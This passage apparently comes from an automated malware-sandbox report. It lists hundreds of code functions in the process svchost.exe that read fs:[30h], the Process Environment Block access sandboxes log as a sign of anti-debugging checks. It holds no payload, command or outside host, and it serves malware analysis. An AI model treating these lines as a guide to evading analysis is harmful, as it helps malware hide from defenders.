            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C9179 mov eax, dword ptr fs:[00000030h]2_2_031C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205152 mov eax, dword ptr fs:[00000030h]2_2_03205152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03187190 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03170185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314B1B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031E11A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031E11A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031E11A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031E11A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032061E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316D1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316D1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D71F9 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032051CB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031351ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F903E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F903E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F903E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F903E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031C6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03205060 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03132050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D705E mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D705E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315B052 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AD070 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B106E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03135096 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315D090 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315D090 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316909C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0313208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BD080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BD080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312D08D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031C80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031590DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AD0C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AD0C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031550E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031550E4 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032050D9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03130710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03160710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316F71F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316F71F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03137703 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03135702 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03135702 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0320B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0320B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0320B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0320B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03129730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03129730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03165734 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0313973A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0313973A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031EF72E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03133720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F972B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03130750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03143740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03143740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03143740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03138770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03203749 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031EF78A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032037B6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315D7B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B97A9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0313C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0313D7E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03133616 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03133616 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03172619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03161607 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316F603 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03205636 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03166620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03168620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0313262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0314C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03162674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]
